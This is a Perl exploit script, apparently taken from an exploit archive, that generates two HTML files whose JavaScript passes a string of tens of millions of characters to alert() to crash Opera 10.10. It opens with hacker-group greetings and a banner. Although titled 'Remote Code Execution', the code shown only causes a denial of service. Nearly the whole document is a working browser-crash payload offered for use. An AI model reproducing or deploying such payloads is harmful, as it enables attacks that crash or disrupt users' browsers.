1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
#!/usr/bin/perl # Title : Opera 10.10 Remote Code Execution DoS Exploit # Tested : Windows xp (sp2) # Description : Opera Web Browser is vulnerable DoS within its javascript tags (alert) # This issue can be exploited by using a large value in a alert tags to create an out-of-bounds memory access # This have in advising at version 9.10 http://www.milw0rm.com/exploits/3871, and good news this issue still work on version 10.10 # Credits to Dj7xpl \ first exploiter # Greetz : str0ke a great man :) #muts and exploit-db #opt!x hacker my best friend :d #and all INDONESIAN hacker community # cr4wl3r kiss your soul from Gorontalo - INDONESIA # Sorry for my bad english :p~ print qq( ################################################### ## Opera 10.10 Remote Code Execution DoS Exploit ## ## Credits : Dj7xpl## ## http://www.milw0rm.com/exploits/3871## ## Author : cr4wl3r <cr4wl3r[!]linuxmail.org>## ## Greetz : str0ke, opt!x hacker, xoron## ## all member at manadocoding.net## ## all member at indonesianhacker.org## ################################################### ); my $header = "<html>\n<script>\n"; my $footer = "</script>\n</html>"; my $uhoh1 = "var buf = 'A';\n". "while (buf.length <= 44444444) buf+=buf;\n". "alert(buf)\n"; ################################################################## open(myfile,'>> uhoh1.html'); print myfile $header.$uhoh1.$footer; ################################################################## my $uhoh2 = "alert(\'". "A" x 44444444 ."'\)"."\n"; ################################################################## open(myfile,'>> uhoh2.html'); print myfile $header.$uhoh2.$footer; ################################################################## print "\nDone, successfully created!\n"; |